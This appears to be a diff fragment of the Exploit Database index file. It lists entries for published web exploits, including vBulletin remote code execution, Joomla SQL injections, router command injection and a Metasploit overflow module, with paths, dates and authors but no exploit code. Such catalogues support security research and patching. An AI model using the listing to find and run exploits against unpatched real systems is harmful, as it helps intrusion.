43361,exploits/multiple/webapps/43361.md,"vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution",2017-12-13,SecuriTeam,webapps,multiple,
43362,exploits/multiple/webapps/43362.md,"vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion",2017-12-13,SecuriTeam,webapps,multiple,
43363,exploits/hardware/webapps/43363.py,"Linksys WVBR0 - 'User-Agent' Remote Command Injection",2017-12-14,nixawk,webapps,hardware,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,
@ -37636,6 +37649,8 @@ id,file,description,date,author,type,platform,port
41633,exploits/hardware/webapps/41633.txt,"DIGISOL DG-HR1400 1.00.02 Wireless Router - Privilege Escalation",2017-03-18,Indrajith.A.N,webapps,hardware,
41634,exploits/php/webapps/41634.txt,"Omegle Clone - SQL Injection",2017-03-18,"Ihsan Sencan",webapps,php,
41636,exploits/php/webapps/41636.txt,"Secure Download Links - 'dc' SQL Injection",2017-03-19,"Ihsan Sencan",webapps,php,
43350,exploits/php/webapps/43350.txt,"Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
43351,exploits/php/webapps/43351.txt,"Joomla! Component Guru Pro - 'promocode' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
@ -38376,3 +38391,4 @@ id,file,description,date,author,type,platform,port
43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592
43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi,
43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80
43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php,

Can't render this file because it is too large.